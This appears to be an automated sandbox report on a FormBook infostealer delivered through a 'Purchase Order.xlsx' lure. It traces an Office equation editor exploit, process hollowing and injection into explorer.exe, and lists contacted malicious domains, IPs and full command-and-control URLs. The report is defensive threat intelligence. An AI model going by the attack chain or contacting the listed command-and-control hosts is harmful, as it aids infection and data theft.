Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Memory written: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe base: 7EFDE008
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 5_2_00BE5240
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 5_2_00BE5EDA
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Process created: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe'
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 5_2_00C288CD
Source: vbc.exe, 00000004.00000002.2182138412.0000000002826000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp, dtz25z5e9sr.exe, 00000006.00000000.2164172039.00000000004B6000.00000002.00020000.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorer.exe, 00000008.00000000.2172476527.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: acqyswhf.exe, explorer.exe, 00000008.00000000.2172476527.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.2380246315.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000008.00000000.2172476527.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C10030 GetLocalTime,__swprintf, 5_2_00C10030
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C10722 GetUserNameW, 5_2_00C10722
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C0416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 5_2_00C0416A
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403461

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
OS version to string mapping found (often used in BOTs)
Source: acqyswhf.exe Binary or memory string: WIN_81
Source: acqyswhf.exe Binary or memory string: WIN_XP
Source: acqyswhf.exe Binary or memory string: WIN_XPe
Source: acqyswhf.exe Binary or memory string: WIN_VISTA
Source: acqyswhf.exe Binary or memory string: WIN_7
Source: acqyswhf.exe Binary or memory string: WIN_8
Source: dtz25z5e9sr.exe, 00000006.00000000.2164172039.00000000004B6000.00000002.00020000.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
Behavior Graph ID: 344798

Sample: Purchase Order.xlsx
Startdate: 27/01/2021
Architecture: WINDOWS
Score: 100

Sample-level DNS/IP info: www.aspiringeyephotos.com, aspiringeyephotos.com
Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures

Process tree:

EXCEL.EXE (started)
  Dropped: C:\Users\user\Desktop\~$Purchase Order.xlsx, data

EQNEDT32.EXE (started)
  DNS/IP: cdn.discordapp.com 162.159.130.233, 443, 49165 CLOUDFLARENETUS United States
  Dropped: C:\Users\user\...\scancopy87867678[1].exe, PE32
  Dropped: C:\Users\Public\vbc.exe, PE32
  Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  -> vbc.exe (started)
     Dropped: C:\Users\user\AppData\Local\...\acqyswhf.exe, PE32
     Signature: Machine Learning detection for dropped file
     -> acqyswhf.exe (started)
        Dropped: C:\Users\user\AppData\...\dtz25z5e9sr.exe, PE32
        Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Sample uses process hollowing technique
        -> dtz25z5e9sr.exe (started)
           Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Modifies the context of a thread in another process (thread injection); 4 other signatures
           -> explorer.exe (injected)
              DNS/IP: land-il.com 50.87.169.249, 49166, 80 UNIFIEDLAYER-AS-1US United States
              DNS/IP: www.bmtxm.com 103.209.233.78, 49171, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Hong Kong
              DNS/IP: 9 other IPs or domains
              Signature: System process connects to network (likely due to code injection or exploit)
              -> svchost.exe (started)
                 Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                 -> cmd.exe (started)
              -> autofmt.exe (started)

Contacted Public IPs

IP               Domain   Country        ASN     ASN Name                               Malicious
162.159.130.233  unknown  United States  13335   CLOUDFLARENETUS                        false
103.209.233.78   unknown  Hong Kong      132839  POWERLINE-AS-APPOWERLINEDATACENTERHK   true
50.87.169.249    unknown  United States  46606   UNIFIEDLAYER-AS-1US                    true
104.21.47.75     unknown  United States  13335   CLOUDFLARENETUS                        true
208.92.209.208   unknown  United States  36536   ENTERHOST-ASUS                         true
23.228.109.141   unknown  United States  46573   LAYER-HOSTUS                           true
81.17.18.195     unknown  Switzerland    51852   PLI-ASCH                               true

Private

IP
192.168.2.255

Contacted Domains

Name IP Active
land-il.com 50.87.169.249 true
www.streamelemeants.com 81.17.18.195 true
www.fsjinhua.net 23.228.109.141 true
www.bmtxm.com 103.209.233.78 true
cdn.discordapp.com 162.159.130.233 true
aspiringeyephotos.com 34.102.136.180 true
www.mct.ltd 104.21.47.75 true
www.chenangopistolpermit.com 208.92.209.208 true
www.land-il.com unknown unknown
www.aspiringeyephotos.com unknown unknown
www.aulbalu.com unknown unknown
www.chuanxingtong.com unknown unknown
www.dchasers.net unknown unknown

Contacted URLs

Name; Malicious; Antivirus Detection; Reputation
http://www.bmtxm.com/j5an/?3fk=6SPexGd0ZJ0Mz+FJ+cy7OLUKwTeaGjB/WusfxloW69kYZYqYrDfxiIlikZagIGHK+b+BQQ==&9rO4=E4xhcD5XlJSXW; true; Avira URL Cloud: safe; unknown
http://www.land-il.com/j5an/?3fk=jkLgRzxvTxu7277EKfJN7tKRHYJxZ3c6o/hCpD9wXnjOSj4zaLYT7gQTd+fjCtE9cXdA/Q==&9rO4=E4xhcD5XlJSXW; true; Avira URL Cloud: safe; unknown
http://www.streamelemeants.com/j5an/?3fk=hrvp4+cUQU8zV/SJvc4Npds81eds1Wb4LfPiDx6kUcwrGKBrK/T3B2SdIv8rg9j1CS48fg==&9rO4=E4xhcD5XlJSXW; true; Avira URL Cloud: safe; unknown
http://www.mct.ltd/j5an/?3fk=jfM0s3t3pF6231rQ9Ypgo/tIMSV8ijVp9KulJ4ArWd+XWOyrlsks5AwgkklZ8lU5NlnM6w==&9rO4=E4xhcD5XlJSXW; true; Avira URL Cloud: safe; unknown